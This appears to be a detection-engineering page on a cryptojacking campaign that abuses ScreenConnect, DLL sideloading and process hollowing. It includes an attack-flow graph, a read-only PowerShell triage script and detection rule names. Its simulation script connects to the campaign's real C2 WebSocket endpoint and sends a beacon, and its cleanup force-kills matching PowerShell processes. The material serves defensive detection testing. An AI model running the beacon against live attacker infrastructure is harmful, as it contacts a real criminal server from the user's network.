From Poisoned Search Results to GPU Mining: A Cryptojacking Campaign Using ScreenConnect and .NET Utilities
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
This campaign uses SEO poisoning and manipulated AI chatbot search results to lure users into downloading fake hardware-monitoring tools. The trojanized installers carry a malicious DLL that sideloads into a legitimate application and quietly deploys ScreenConnect. Attackers then use ScreenConnect to launch a custom RunPE dropper that hollows out Microsoft-signed .NET binaries and injects the next-stage payload. The final stage downloads GPU mining tools such as gminer, lolMiner, and SRBMiner-MULTI, then maintains persistence through scheduled tasks, registry Run keys, and a startup shortcut. The malware also adds Windows Defender exclusions to reduce the chance of detection.
Investigation
Microsoft Defender researchers mapped the full infection chain, including the DLL sideloading method, abuse of ScreenConnect as a remote management tool, and use of a custom RunPE loader named SimpleRunPE.exe. Analysts recovered the ScreenConnect command-line arguments, identified the list of signed .NET binaries used for process hollowing, and documented a command-and-control endpoint protected with a pinned TLS certificate. The investigation also uncovered supporting infrastructure such as malicious domains, IP addresses, and DNS provider details linked to the campaign.
Mitigation
Defenders should enable cloud-delivered protection, enforce attack surface reduction rules, block executable files that do not meet reputation, prevalence, or age requirements, and turn on web and network protection in Microsoft Defender for Endpoint. Remote management tools such as ScreenConnect should be disabled where unnecessary or tightly controlled where required, with monitoring for unauthorized scheduled tasks and suspicious registry Run entries. Any Windows Defender exclusions added by the malware should be removed immediately, and the identified malicious domains and IP addresses should be blocked.
Response
If RuntimeHost.exe or SimpleRunPE.exe is found running from hidden cache directories, isolate the affected host at once, terminate the related ScreenConnect session, and remove all persistence mechanisms, including scheduled tasks, Run keys, and startup shortcuts. Block the domain minemine.gleeze.com and the observed IP addresses, then hunt across the environment for the listed miner binaries and autorun.dll. Finally, restore Defender protections and review exclusion settings for any unauthorized changes.
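The Mitigation and Response guidance above names concrete host artifacts to hunt for: the WinSysCache Run value, scheduled tasks such as "Windows System Health", a Startup shortcut to RuntimeHost.exe, Defender exclusions, the RuntimeHost.exe / SimpleRunPE.exe processes and the WebSocket C2 on port 8443. The PowerShell triage script below is an added example that is not code from the Microsoft Defender report or from the detection platform this page belongs to; it checks each of those points on one host and returns findings as objects. It assumes the Run value name, task name pattern and port exactly as they appear in this page's attack flow, and the `$Indicators` table and the empty `C2Addresses` placeholder are my additions (fill the latter from the DestinationIP IOC list).

```powershell
# Added host triage script for the indicators named on this page (not from the Defender
# report or the detection platform). Read-only: it reports, it does not remove anything.
# Assumptions not stated on the page: the Run value is named exactly 'WinSysCache',
# task names match 'Windows System Health', the C2 port is 8443, and C2Addresses is
# populated from the page's DestinationIP IOC list (left as an empty placeholder here).

$Indicators = @{
    RunValueName  = 'WinSysCache'
    TaskNameRegex = 'Windows System Health'
    BinaryRegex   = 'RuntimeHost\.exe|SimpleRunPE\.exe|autorun\.dll|gminer|lolMiner|SRBMiner-MULTI'
    C2Port        = 8443
    C2Addresses   = @()   # placeholder: fill from the DestinationIP IOC list
}

function New-Finding {
    param([string]$Category, [string]$Detail, [string]$Source)
    [pscustomobject]@{ Category = $Category; Detail = $Detail; Source = $Source }
}

function Get-RunKeyFindings {
    # Registry Run keys in HKLM and HKCU that carry the WinSysCache value
    foreach ($hive in 'HKLM', 'HKCU') {
        $key   = "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if ($props -and $props.PSObject.Properties[$Indicators.RunValueName]) {
            New-Finding 'Persistence:RunKey' $props.($Indicators.RunValueName) "$key\$($Indicators.RunValueName)"
        }
    }
}

function Get-ScheduledTaskFindings {
    # Tasks whose name matches the campaign pattern or whose action launches a named binary
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $cmd = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        if ($task.TaskName -match $Indicators.TaskNameRegex -or $cmd -match $Indicators.BinaryRegex) {
            New-Finding 'Persistence:ScheduledTask' $cmd "$($task.TaskPath)$($task.TaskName)"
        }
    }
}

function Get-StartupShortcutFindings {
    # .lnk files in the per-user and all-users Startup folders pointing at a campaign binary
    $shell = New-Object -ComObject WScript.Shell
    foreach ($folder in 'Startup', 'CommonStartup') {
        $path = [Environment]::GetFolderPath($folder)
        foreach ($lnk in (Get-ChildItem -Path $path -Filter *.lnk -ErrorAction SilentlyContinue)) {
            $target = $shell.CreateShortcut($lnk.FullName).TargetPath
            if ($target -match $Indicators.BinaryRegex) {
                New-Finding 'Persistence:StartupShortcut' $target $lnk.FullName
            }
        }
    }
}

function Get-DefenderExclusionFindings {
    # Every path/process exclusion is listed for review; those naming a campaign binary are hits
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if (-not $pref) { return }
    $entries = @($pref.ExclusionPath    | ForEach-Object { @{ Kind = 'Path';    Value = $_ } }) +
               @($pref.ExclusionProcess | ForEach-Object { @{ Kind = 'Process'; Value = $_ } })
    foreach ($e in $entries) {
        if (-not $e.Value) { continue }
        $cat = if ($e.Value -match $Indicators.BinaryRegex) { 'DefenderExclusion:Hit' } else { 'DefenderExclusion:Review' }
        New-Finding $cat $e.Value "Get-MpPreference.Exclusion$($e.Kind)"
    }
}

function Get-ProcessFindings {
    # Running loader/host processes, with their on-disk path (hidden cache directories are the tell)
    foreach ($p in (Get-Process -Name RuntimeHost, SimpleRunPE -ErrorAction SilentlyContinue)) {
        New-Finding 'Process:Running' $p.Path "PID $($p.Id)"
    }
}

function Get-C2ConnectionFindings {
    # Established TCP sessions to the C2 port or to any IOC address, with the owning process
    foreach ($c in (Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue)) {
        if ($c.RemotePort -eq $Indicators.C2Port -or $Indicators.C2Addresses -contains $c.RemoteAddress) {
            $owner = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
            New-Finding 'Network:C2Candidate' "$($c.RemoteAddress):$($c.RemotePort)" "$($owner.Name) (PID $($c.OwningProcess))"
        }
    }
}

function Invoke-CampaignTriage {
    $findings = @(Get-RunKeyFindings) + @(Get-ScheduledTaskFindings) + @(Get-StartupShortcutFindings) +
                @(Get-DefenderExclusionFindings) + @(Get-ProcessFindings) + @(Get-C2ConnectionFindings)
    if (-not $findings) { Write-Host 'No campaign indicators found on this host.' }
    $findings
}

Invoke-CampaignTriage | Format-Table -AutoSize -Wrap
```

Run it elevated so HKLM, all scheduled tasks and Defender preferences are readable. The script deliberately reports every Defender exclusion rather than only the ones it recognises, since the Response section asks for a review of all exclusion changes; removal of persistence (Unregister-ScheduledTask, Remove-ItemProperty, Remove-MpPreference) is left as a separate, confirmed step.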
Attack Flow
graph TB
%% Class definitions
classDef action fill:#99ccff
classDef technique fill:#ffdd99
classDef tool fill:#cccccc
classDef malware fill:#ff9999
classDef process fill:#ffcc66
classDef persistence fill:#99ff99
classDef defense fill:#ff66cc
classDef privilege fill:#ffb366
classDef c2 fill:#66ccff
classDef discovery fill:#c2c2f0
%% Nodes
action_initial_access["<b>Action</b> – <b>T1659 Content Injection</b><br/>SEO poisoning and AI-chatbot links deliver malicious ZIP files masquerading as utilities."]
class action_initial_access action
technique_event_trigger["<b>Technique</b> – <b>T1546.009 AppCert DLL</b><br/>autorun.dll placed beside legitimate utility is loaded when the utility runs."]
class technique_event_trigger technique
process_msiexec["<b>Process</b> – msiexec.exe"]
class process_msiexec process
technique_dll_injection["<b>Technique</b> – <b>T1055.001 Dynamic-link Library Injection</b><br/>autorun.dll invokes msiexec to silently install malicious vcredist_x64.dll containing ScreenConnect installer."]
class technique_dll_injection technique
technique_proxy_execution["<b>Technique</b> – <b>T1218.007 Msiexec Proxy Execution</b><br/>msiexec runs the malicious installer and establishes a ScreenConnect client."]
class technique_proxy_execution technique
malware_screenconnect["<b>Malware</b> – ScreenConnect client"]
class malware_screenconnect malware
persistence_scheduled["<b>Persistence</b> – <b>T1543 Scheduled Tasks</b><br/>Tasks named “Windows System Health” etc. relaunch the malware."]
class persistence_scheduled persistence
persistence_registry["<b>Persistence</b> – <b>T1037.001 Logon Script</b><br/>Registry Run keys (HKLM/HKCU\Run\WinSysCache) added."]
class persistence_registry persistence
persistence_startup["<b>Persistence</b> – <b>T1037.004 RC Script</b><br/>Shortcut in Startup folder points to RuntimeHost.exe."]
class persistence_startup persistence
defense_exclusions["<b>Defense Evasion</b> – <b>T1564.012 File/Path Exclusions</b> & <b>T1564.010 Process Argument Spoofing</b><br/>Adds Windows Defender exclusions for files and processes."]
class defense_exclusions defense
defense_impair["<b>Defense Evasion</b> – <b>T1562 Impair Defenses</b><br/>Uses the exclusions to bypass AV detection."]
class defense_impair defense
defense_sandbox["<b>Defense Evasion</b> – <b>T1497 Virtualization/Sandbox Evasion</b><br/>User activity checks (T1497.002) and time based evasion (T1497.003) abort execution in analysis environments."]
class defense_sandbox defense
defense_codesign["<b>Defense Evasion</b> – <b>T1553.002 Subvert Trust Controls</b><br/>Malicious code runs inside Microsoft-signed .NET binaries via process hollowing."]
class defense_codesign defense
privilege_hollowing["<b>Privilege Escalation</b> – <b>T1055.012 Process Hollowing</b><br/>SimpleRunPE launches a legitimate .NET binary in suspended state and injects the payload."]
class privilege_hollowing privilege
c2_websocket["<b>Command and Control</b> – <b>T1102.002 Websocket</b><br/>Encrypted wss://minemine.gleeze.com:8443/ws with TLS pinning."]
class c2_websocket c2
discovery_info["<b>Discovery</b> – <b>T1082 System Info</b>, <b>T1592.001 Hardware</b>, <b>T1592.002 Software</b><br/>Collects CPU, GPU, RAM, OS version, security product, etc., to assess mining viability."]
class discovery_info discovery
%% Flow connections
action_initial_access -->|leads to| technique_event_trigger
technique_event_trigger -->|loads| process_msiexec
process_msiexec -->|executes| technique_dll_injection
technique_dll_injection -->|installs| technique_proxy_execution
technique_proxy_execution -->|installs| malware_screenconnect
malware_screenconnect -->|creates| persistence_scheduled
malware_screenconnect -->|creates| persistence_registry
malware_screenconnect -->|creates| persistence_startup
malware_screenconnect -->|adds| defense_exclusions
defense_exclusions -->|enables| defense_impair
defense_impair -->|facilitates| defense_sandbox
defense_sandbox -->|supported by| defense_codesign
defense_codesign -->|enables| privilege_hollowing
privilege_hollowing -->|establishes| c2_websocket
c2_websocket -->|receives| discovery_info
Detections
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
- Alternative Remote Access / Management Software (via process_creation)
- Suspicious CURL Usage (via cmdline)
- Call Suspicious .NET Methods from Powershell (via powershell)
- Windows Defender Preferences Suspicious Changes (via powershell)
- Possible Evasion Checks (via powershell)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- IOCs (HashSha256) to detect: From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities
- IOCs (SourceIP) to detect: From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities
- IOCs (DestinationIP) to detect: From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities
- C2 Communication from Hollowed Binary [Windows Network Connection]
- Persistent Remote Access and Process Hollowing via ScreenConnect and SimpleRunPE [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An attacker has already delivered a hollowed legitimate binary onto the victim machine. The binary now initiates a persistent C2 channel over a WebSocket connection to wss://minemine.gleeze.com:8443/ws. To emulate this, we use a PowerShell script that creates a .NET ClientWebSocket, optionally installs a custom TLS certificate validation callback (simulating certificate pinning), and keeps the connection open for a brief period so the network-connection telemetry the detection expects is produced.
Regression Test Script:
# Simulate C2 communication from a hollowed binary
# Requirements: PowerShell 5+ (built-in .NET classes)
$c2Url = 'wss://minemine.gleeze.com:8443/ws'

# OPTIONAL: enforce certificate pinning (accept only a specific thumbprint).
# The pin is installed through ServicePointManager, which ClientWebSocket on .NET Framework
# honours (an HttpClientHandler callback is never consulted by ClientWebSocket). A compiled
# callback is used because the TLS handshake runs on a worker thread, where a PowerShell
# scriptblock has no runspace. Off by default; set $enforcePinning = $true and a real thumbprint.
$enforcePinning    = $false
$allowedThumbprint = 'ABCD1234EF567890ABCD1234EF567890ABCD1234'   # placeholder
if ($enforcePinning) {
    Add-Type -TypeDefinition @"
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
public static class PinnedCert {
    public static string Thumbprint;
    public static bool Validate(object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors errors) {
        // GetCertHashString() is the SHA-1 thumbprint as uppercase hex
        return cert != null && cert.GetCertHashString() == Thumbprint;
    }
}
"@
    [PinnedCert]::Thumbprint = $allowedThumbprint
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback =
        [System.Delegate]::CreateDelegate([System.Net.Security.RemoteCertificateValidationCallback],
                                          [PinnedCert].GetMethod('Validate'))
}

# Create WebSocket client
$ws = [System.Net.WebSockets.ClientWebSocket]::new()
try {
    Write-Host "Connecting to C2 endpoint $c2Url ..."
    $ws.ConnectAsync([System.Uri]::new($c2Url), [System.Threading.CancellationToken]::None).Wait()
    Write-Host "Connection established. Sending beacon payload..."

    # Send a dummy beacon (JSON)
    $payload = '{ "beat": "alive", "ts": "' + (Get-Date).ToString('o') + '" }'
    $bytes   = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $segment = [System.ArraySegment[byte]]::new($bytes)
    $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true,
                  [System.Threading.CancellationToken]::None).Wait()

    Start-Sleep -Seconds 10   # Keep the channel open for a short window
}
catch {
    # A refused, sinkholed or pinning-rejected endpoint still yields the DNS and connection telemetry
    Write-Warning "WebSocket simulation failed: $($_.Exception.GetBaseException().Message)"
}
finally {
    Write-Host "Closing WebSocket..."
    $ws.Abort()
    if ($enforcePinning) { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $null }
}
Cleanup Commands:
# Ensure any lingering WebSocket processes are terminated
Get-Process -Name powershell -ErrorAction SilentlyContinue |
    Where-Object { $_.MainWindowTitle -match 'WebSocket' } |
    Stop-Process -Force
# Optionally remove temporary files used in the test (path separator was missing before)
Remove-Item -Path (Join-Path $env:TEMP '*C2Simulation*') -Force -ErrorAction SilentlyContinue
# Reset the process-wide certificate validation callback in case pinning was enabled
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = $null